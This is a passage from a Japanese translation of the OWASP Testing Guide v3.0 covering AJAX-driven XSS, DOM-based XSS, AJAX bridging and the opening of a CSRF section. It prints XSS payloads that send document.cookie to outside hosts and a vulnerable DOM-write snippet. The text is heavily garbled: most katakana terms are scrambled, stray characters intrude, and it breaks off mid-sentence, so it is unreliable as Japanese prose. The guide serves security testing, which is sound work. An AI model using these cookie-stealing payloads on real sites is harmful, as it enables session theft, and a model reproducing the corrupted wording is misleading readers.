OWASP テスティングガイド

OWASP Testing Guide v3.0
ウシトに 追 加 するでしょう。それから、JavaScript ケードは、この 隠 れたヨキウシトに 対 するリシホヱシを 評 価 して、 更 なるヨキウ
シトを 送 ります。JavaScript 機 能 のこの 拡 張 により、キルシ・コイト・シキヨプティヱギ(XSS' 攻 撃 が 引 き 起 こす 被 害 の 可 能 性 を 増
すことになります。
また、XSS 攻 撃 は、ヤーゴが 見 ている 最 新 のヘーザの 他 、 特牐 定 のヘーザにヨキウシトを 送 ることができるでしょう。このことは、
攻 撃 者 が、 能 動 的 にある 内 容 を 探 し、こっそりとデーソにアキスシするのを 許 してしまいます。
XSS の 負 荷 デーソは、 自 身 をヘーザへ 自 律 的 に 挿 入 することに、AJAX ヨキウシトを 利 用 することができます。そして、(ウイラ
シのような'さらなる XSS を 使 って、 簡 単 に 同 じベシトへ 再 挿 入 することができます。そういったことは 全 て、ハードを 更 新 しな
くても 行 うことができます。 従 って、XSS は、 複 雑 に HTTP の 方 法 を 使 って 複 数 のヨキウシトを 送 り、ヤーゴに 見 えないように 自
身 を 拡 散 させることができます。
例
alert("howdy")
document.location='http://www.example.com/pag.pl?'%20+document.cookie
使 い 方 は、 次 のようになります。
http://example.com/login.php?variable=">document.location='http://www.irr.com/cont.ph
p?'+document.cookie
これは、ヨキウシトが 要 求 した 本 来 のヘーザへルギを 残 した 後 、そのヘーザを 知 らない 悪 意 のあるヘーザに、 単 に 転 送 する
だけです。
クラアアンヱテ 側 のアンヱジェクシュンヱの 脅 威
• XSS の 弱 点 では、キョイアヱト 側 のデーソへのアキスシ 権 を 与 え、キョイアヱト 側 のケードを 更 新 することさえもできて
しまいます。
• DOM イヱザェキサュヱは XSS イヱザェキサュヱの 一 種 であり、XSS イヱザェキサュヱが DOM(Document Object Model'
のコブエブザェキトや、document.location、document.URL、document.referrer を 通 して 起 こったものです。
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
• JSON/XML/XSLT イヱザェキサュヱ ‐XML ケヱテヱツに 悪 意 あるケードを 挿 入 します。
AJAX ブリチジンヱギ
スカャヨティの 目 的 で、AJAX アプヨクーサュヱは、 自 分 がやって 来 た 元 のウェブコイトにだけに 接 続 し 直 すことができます。
例 えば、yahoo.com からゾウヱルードされた AJAX を 含 む JavaScript は、google.com へ 接 続 することはできません。このよう
に AJAX が 第 三 者 のコイトへ 接 続 するのを 許 可 すると、AJAX コービシ・ブヨッザが 作 られるでしょう。ブヨッザによりベシトは、キ
ョイアヱトで 動 作 している JavaScript と 第 三 者 のコイトとの 間 で、 通 信 を 送 るプルカサのような 挙 動 をするウェブコービシを 提
供 します。ブヨッザは、「ウェブコービシへのウェブコービシ」という 接 続 に 使 わわれることが 考 えられます。 攻 撃 者 は、これをア
キスシ 制 限 のあるコイトに 接 続 するために 利 用 することでしょう。
クロス・サアテ・リクエステ・フォージェリ(CSRF
CSRF)
CSRF は、 被 害 者 のウェブブョウゴからの HTTP ヨキウシトを、 攻 撃 者 が 選遥 ぶウェブコイトに、 攻 撃 者 が 強 制 的 に 送 信 させる 脆
331